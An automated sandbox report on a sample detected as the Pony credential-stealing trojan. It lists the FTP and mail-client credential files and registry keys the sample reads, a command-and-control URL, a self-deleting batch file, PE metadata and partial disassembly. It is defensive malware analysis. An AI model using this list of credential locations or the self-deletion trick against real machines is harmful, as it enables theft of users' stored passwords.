            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\AceBIT\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Windows\32BitFtp.iniJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\NetSarang\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\3D-FTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\NetSarang\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FTPRush\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\History.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: HKEY_LOCAL_MACHINE\Software\TurboFTPJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Local\Frigate3\Jump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Tries to steal Mail credentials (via file registry)
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword0_2_0040E785
            Source: C:\Users\user\Desktop\2qsdqACnX3.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword0_2_0040E785
            Source: Yara matchFile source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Pony
            Source: Yara matchFile source: 2qsdqACnX3.exe, type: SAMPLE
            Source: Yara matchFile source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		1
            Valid Accounts            		2
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		1
            Valid Accounts            		2
            OS Credential Dumping            		1
            Security Software Discovery            		Remote Services1
            Email Collection            		2
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Scripting            		11
            Access Token Manipulation            		11
            Access Token Manipulation            		2
            Credentials in Registry            		1
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading            		11
            Process Injection            		11
            Process Injection            		Security Account Manager1
            Account Discovery            		SMB/Windows Admin Shares2
            Data from Local System            		SteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		NTDS1
            System Owner/User Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets3
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Install Root Certificate            		Cached Domain Credentials14
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            2qsdqACnX3.exe78%VirustotalBrowse
            2qsdqACnX3.exe95%ReversingLabsWin32.Infostealer.Pony
            2qsdqACnX3.exe100%AviraTR/PSW.Fareit.iloen
            2qsdqACnX3.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://gunnylaumienphi2017.com/1%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://gunnylaumienphi2017.com/YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.01%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://gunnylaumienphi2017.com/trueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://https://ftp://operawand.dat_Software2qsdqACnX3.exefalse
              		unknown
              https://ac.ecosia.org/autocomplete?q=2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/chrome_newtab2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/ac/?q=2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              ftp://http://https://ftp.fireFTPsites.datSeaMonkey2qsdqACnX3.exefalse
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.ecosia.org/newtab/2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://gunnylaumienphi2017.com/YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.02qsdqACnX3.exefalseunknown

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523193
                Start date and time:2024-10-01 09:26:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 1m 48s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:4
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:2qsdqACnX3.exe
                renamed because original name is a hash value
                Original Sample Name:73339cacdb37937c47ea7668ac3a1017.exe
                Detection:MAL
                Classification:mal100.troj.spyw.winEXE@5/1@0/0
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 81
                • Number of non-executed functions: 41
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\5990015.bat

                Download File
                Process:C:\Users\user\Desktop\2qsdqACnX3.exe
                File Type:ASCII text, with CRLF, CR line terminators
                Category:dropped
                Size (bytes):94
                Entropy (8bit):3.233204299824007
                Encrypted:false
                SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                MD5:3880EEB1C736D853EB13B44898B718AB
                SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.198880234677548
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.56%
                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                • Windows Screen Saver (13104/52) 0.13%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                File name:2qsdqACnX3.exe
                File size:83'968 bytes
                MD5:73339cacdb37937c47ea7668ac3a1017
                SHA1:b32d273a752ad25173e26a110ae05acbabf3f15d
                SHA256:d0abb0bd329f13afadfb0bbf6730f2233488b8c6c6f5e593d61d91b20fe8b772
                SHA512:6629b294d431b49f7d3272dc0bcaa85eaa2a82f0f3eceea27ff071ff4b7048af2b0a70bed658ad22e53b6d70d239399f477d5a2122d84bb6e28435678eefd41d
                SSDEEP:1536:YSSH/BiqTiTQROZFdQ6sPr2F7oW6fQrNZL3cncOaEzSkzmeL:ZS5MvXdfsPr2F7pyQhDOaEzKeL
                TLSH:0683F702F481F0F1C1A126B137C153B1E7F99E79783A4D5EEF4C89847DA628B7B16462
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............2.....N....................@..........................`.............................................

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0x40ff8b
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                DLL Characteristics:
                Time Stamp:0x66F7AFAD [Sat Sep 28 07:26:37 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:8d644d676851d7b6f34d624a7462831f

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                pop ebp
                push 0040FF99h
                clc
                jc 00007F0B25041B13h
                ret
                jmp far eax
                push esp
                add byte ptr [eax], al
                add byte ptr [ecx+0000000Ah], bh
                xor edx, edx
                div ecx
                cmp edx, 05h
                jne 00007F0B25041B14h
                jmp 00007F0B25041B14h
                jmp 00007F0B25041AFBh
                call 00007F0B25041A92h
                push 00000000h
                call 00007F0B25041C41h
                jmp dword ptr [00415020h]
                jmp dword ptr [00415024h]
                jmp dword ptr [00415028h]
                jmp dword ptr [0041502Ch]
                jmp dword ptr [00415030h]
                jmp dword ptr [00415034h]
                jmp dword ptr [00415038h]
                jmp dword ptr [0041503Ch]
                jmp dword ptr [00415040h]
                jmp dword ptr [00415044h]
                jmp dword ptr [00415048h]
                jmp dword ptr [0041504Ch]
                jmp dword ptr [00415050h]
                jmp dword ptr [00415054h]
                jmp dword ptr [00415058h]
                jmp dword ptr [0041505Ch]
                jmp dword ptr [00415060h]
                jmp dword ptr [00415064h]
                jmp dword ptr [00415068h]
                jmp dword ptr [0041506Ch]
                jmp dword ptr [00415070h]
                jmp dword ptr [00415074h]
                jmp dword ptr [00415078h]
                jmp dword ptr [0041507Ch]
                jmp dword ptr [00415080h]

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x14de40xb4.data
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000xfd2b0xfe0088216a614d6c7f5dbcdad643224e119eFalse0.45758489173228345data5.993619419981743IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .data0x110000x4d580x48000d9987a474ebc4800e4e69b9ac14b2ecFalse0.4222005208333333data5.272866548522773IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                KERNEL32.DLLCreateFileA, ReadFile, CloseHandle, WriteFile, lstrlenA, GlobalLock, GlobalUnlock, LocalFree, LocalAlloc, GetTickCount, lstrcpyA, lstrcatA, GetFileAttributesA, ExpandEnvironmentStringsA, GetFileSize, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, LoadLibraryA, GetProcAddress, GetTempPathA, CreateDirectoryA, DeleteFileA, GetCurrentProcess, WideCharToMultiByte, GetLastError, lstrcmpA, CreateToolhelp32Snapshot, Process32First, OpenProcess, Process32Next, FindFirstFileA, lstrcmpiA, FindNextFileA, FindClose, GetModuleHandleA, GetVersionExA, GetLocaleInfoA, GetSystemInfo, GetWindowsDirectoryA, GetPrivateProfileStringA, SetCurrentDirectoryA, GetPrivateProfileSectionNamesA, GetPrivateProfileIntA, GetCurrentDirectoryA, lstrlenW, MultiByteToWideChar, Sleep, GetModuleFileNameA, LCMapStringA, ExitProcess, SetUnhandledExceptionFilter
                advapi32.dllRegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyA, RegEnumKeyExA, RegCreateKeyA, RegSetValueExA, IsTextUnicode, RegOpenCurrentUser, RegEnumValueA, GetUserNameA
                ole32.dllCreateStreamOnHGlobal, GetHGlobalFromStream, CoCreateGuid, CoTaskMemFree, CoCreateInstance, OleInitialize
                shlwapi.dllStrStrIA, StrRChrIA, StrToIntA, StrStrA, StrCmpNIA, StrStrIW
                user32.dllwsprintfA
                userenv.dllLoadUserProfileA, UnloadUserProfile
                wininet.dllInternetCrackUrlA, InternetCreateUrlA
                wsock32.dllinet_addr, gethostbyname, socket, connect, closesocket, send, select, recv, setsockopt, WSAStartup

                Network Behavior

                No network behavior found

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:03:26:55
                Start date:01/10/2024
                Path:C:\Users\user\Desktop\2qsdqACnX3.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\2qsdqACnX3.exe"
                Imagebase:0x400000
                File size:83'968 bytes
                MD5 hash:73339CACDB37937C47EA7668AC3A1017
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: pony, Description: Identify Pony, Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                Reputation:low
                Has exited:true

                General

                Target ID:2
                Start time:03:26:57
                Start date:01/10/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "
                Imagebase:0x790000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:3
                Start time:03:26:57
                Start date:01/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:30.8%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:12.9%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:30
                  execution_graph 7470 40ff45 SetUnhandledExceptionFilter 7471 40ff4f 7470->7471 7482 40f672 7471->7482 7473 40ff54 7474 40ff71 7473->7474 7475 40ff6b RevertToSelf 7473->7475 7487 40fb9c 7474->7487 7475->7474 7477 40ff80 7493 40fca6 7477->7493 7479 40ff85 7510 40f9de 7479->7510 7481 40ff8a 7483 40f685 7482->7483 7484 40f686 7482->7484 7483->7473 7485 40f6a1 GetTickCount 7484->7485 7486 40f6cb 7484->7486 7485->7484 7486->7473 7488 40fbaf 7487->7488 7489 40fbb0 7487->7489 7488->7477 7490 40fbc3 7489->7490 7491 40287f LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 7489->7491 7541 401769 LocalAlloc 7489->7541 7490->7477 7491->7489 7494 40fcba 7493->7494 7507 40fcbb 7493->7507 7494->7479 7495 40fcce 7495->7479 7496 40fd04 LogonUserA 7496->7507 7497 40fced lstrcmpiA 7497->7496 7497->7507 7498 40fdb3 746D1B10 7498->7507 7500 40fd32 lstrlen LCMapStringA 7502 40fd58 LogonUserA 7500->7502 7500->7507 7501 40fe18 ImpersonateLoggedOnUser 7501->7507 7502->7507 7503 401752 LocalFree 7503->7507 7504 40fe54 CloseHandle 7504->7507 7505 40fe49 746C5030 7505->7504 7506 40fd90 LogonUserA 7506->7498 7506->7507 7507->7495 7507->7496 7507->7497 7507->7498 7507->7501 7507->7503 7507->7504 7507->7505 7507->7506 7508 40fe33 RevertToSelf 7507->7508 7509 40fe39 7507->7509 7542 4027f2 lstrlen 7507->7542 7508->7509 7509->7507 7511 40f9f0 7510->7511 7512 40f9f1 7510->7512 7511->7481 7546 401769 LocalAlloc 7512->7546 7514 40fa01 GetTickCount wsprintfA 7547 401769 LocalAlloc 7514->7547 7516 40fa2b 7548 401769 LocalAlloc 7516->7548 7518 40fa43 7549 401769 LocalAlloc 7518->7549 7520 40fa56 GetModuleFileNameA GetTempPathA 7521 40faa8 ExitProcess 7520->7521 7522 40fa98 lstrcat 7520->7522 7523 40facd lstrcpy StrRChrIA 7521->7523 7524 40fb0f lstrlen 7521->7524 7522->7521 7525 40faf2 ExitProcess 7523->7525 7526 40fae8 lstrcpy 7523->7526 7550 401422 7524->7550 7525->7524 7528 40fb35 7525->7528 7526->7525 7541->7489 7545 401769 LocalAlloc 7542->7545 7544 402804 lstrcpy 7544->7500 7545->7544 7546->7514 7547->7516 7548->7518 7549->7520 7551 40142c WriteFile 7550->7551 10741 40b4c9 10742 40b60c 10741->10742 10743 401752 LocalFree 10742->10743 10744 40b614 10743->10744 7469 401011 CreateStreamOnHGlobal 10562 40fe97 OleInitialize 10580 402305 10562->10580 10565 40f672 GetTickCount 10566 40fea6 10565->10566 10597 4029d6 10566->10597 10568 40feb0 10569 40feb4 10568->10569 10570 40fec7 10568->10570 10644 402abc 10569->10644 10615 401769 LocalAlloc 10570->10615 10574 40fed1 GetUserNameA 10581 4022ab 2 API calls 10580->10581 10582 402314 10581->10582 10583 4022ab 2 API calls 10582->10583 10584 402323 10583->10584 10585 4022ab 2 API calls 10584->10585 10586 402332 10585->10586 10587 4022ab 2 API calls 10586->10587 10588 402341 10587->10588 10589 4022ab 2 API calls 10588->10589 10590 402350 10589->10590 10591 4022ab 2 API calls 10590->10591 10592 40235f 10591->10592 10593 4022ab 2 API calls 10592->10593 10594 40236e 10593->10594 10595 4022ab 2 API calls 10594->10595 10596 40237d 10595->10596 10596->10565 10598 4029e9 10597->10598 10599 4029ea 10597->10599 10598->10568 10600 402a06 10599->10600 10601 402a0b GetCurrentProcess OpenProcessToken 10599->10601 10600->10568 10602 402ab7 10601->10602 10603 402a27 GetTokenInformation 10601->10603 10602->10568 10604 402a45 GetLastError 10603->10604 10605 402aaf CloseHandle 10603->10605 10604->10605 10606 402a4f 10604->10606 10605->10602 10606->10605 10615->10574 10645 402ad2 10644->10645 10646 402ad3 10644->10646 10796 40b818 10797 40b82f 10796->10797 10798 40b826 10796->10798 10798->10797 10799 40b8aa CryptUnprotectData 10798->10799 10799->10797 10801 40b8dd 10799->10801 10800 40b901 LocalFree 10800->10797 10802 40b919 10800->10802 10801->10797 10801->10800 10802->10797 10811 401769 LocalAlloc 10802->10811 10804 40b935 10805 40b946 lstrlen StrCmpNIA 10804->10805 10806 40b962 lstrlen StrCmpNIA 10805->10806 10807 40b97a 10805->10807 10806->10807 10808 40b97e lstrlen StrCmpNIA 10807->10808 10810 40b996 10807->10810 10808->10810 10809 401752 LocalFree 10809->10797 10810->10809 10811->10804 10666 40ff9a 10667 40ff99 GetTickCount 10666->10667 10668 40ffac 10666->10668 10667->10668 10670 